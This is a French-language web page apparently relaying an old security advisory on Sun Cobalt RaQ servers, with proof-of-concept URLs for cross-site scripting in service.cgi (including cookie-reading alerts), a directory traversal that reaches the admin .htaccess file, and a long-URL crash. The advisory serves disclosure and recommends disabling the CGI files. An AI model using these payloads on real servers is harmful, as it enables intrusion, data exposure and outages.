Yacapa .com - Téléchargement Multiple vuln�rabilit� pour Cobalt RaQ - Télécharger des jeux et logiciels Multiple vuln�rabilit� pour Cobalt RaQ

vnunet

Télécharger des jeux et logiciels

VNUNET

SVM

Top Recherche

» Plus

éCHANGE DE LIENS

Page principale >Hacking / S�curit�

Multiple vuln�rabilit� pour Cobalt RaQ

Cobalt TaQ de sun est une serveur web pour ISP. Il peut h�berger jusqu'a 200 sites web. De multiples vuln�rabilit�s, de type Cross Site Scripting, Directory Traversal et DoS, sont exploitables.

Cross site scripting:
Html Tag et javascript peuvent etre inserr�s dans 2 services CGI:
alert.cgi
service.cgi
En attendant un correctif, il est conseill� de supprimer ces 2 fichiers ou de les d�sactiv�s.
exemples:

http://site.com:81/cgi-bin/.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('hello')</script>

http://site.com:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Microsoft%20hole')</script>

http://site.com:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert(document.domain)>

http://site.com:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert(document.cookie)</script>

Location:
http://site.com:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.location)%3C/script%3E

Cookies:
http://site.com:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Tag images:
http://site.com:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert(document.domain)>

Write document:
http://site.com:81/cgi-bin/.cobalt/alert/service.cgi?service=<SCRIPT>document.write(document.domain)</SCRIPT>

Directory traversal:
"/usr/admserv/html/.cobalt/admin
Les cgi permettent d'acceder � tout fichier dont l'acces est restreint
Example:
http://site.com:81/.cobalt/sysManage/../admin/.htaccess

Denie de service:
Le serveur crash s'il recoit une tres longue URL
exemple:
http://site.com:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA...(Ax100000)...AAA

source: Alex Hernandez

Les + Lus Dans Cette Catégorie

Le Processus d activation de Windows XP mis a nu

Mais quel sont les informations que windows XP envoit � microsoft lors de l'activation du systeme d'exploitation? Quand on connait la politique de la vie priv�e de redmond, on s'attend au pire....
Suite...

Savoir si La RIAA vous en veut

Vous etes un acharn� du download sur Kazaa. Votre mule tourne a 110 % et votre disque dur pullule de DivX. Ce que vous ne savez peut etre pas, c'est que vous etes peut etre le prochain sur la liste des poursuites judiciaires de la RIAA.
Suite...

le portable Orange SPV vulnerable

Une faille de securit� touche le portable Orange SPV ( sound picture video ). Le probleme provient des signatures num�riques ger�es par un logiciel developp� par ... Microsoft :)
Suite...

17 ans et 2000 sites hackes, dont 1 de trop !

DKD, 17 ans et demi, lyc�en, a �t� arr�t� chez ses parents � V�lizy-Villacoublay apr�s une enqu�te de policiers de la criminalit� informatique. Apr�s s'etre attaqu� au site de la NAVY, c'est le site ..... d'une pr�fecture qui lui aurait �t� fatal.
Suite...

et de 1 pour office 2003

"Overview of the Office 2003 Critical Update", c'est le nom du premier rejeton d'une grande lign�e de bug et patch que s'apprete a connaitre le nouveau Microsoft Office 2003.
Suite...

Navigation Rapide

Astuces Webmaster

Astuces WINDOWS

Astuces WINDOWS XP

Comment �a marche

DVD / Secret

Evenements

Exploits

Hacking / S�curit�

Hardware

Jeux Vid�o

linux

News

Script(php,java...)

Telephonie/GSM

Virus

L'ACTUALITé SUR VNUNET.FR

» Plus

Télécharger

publicité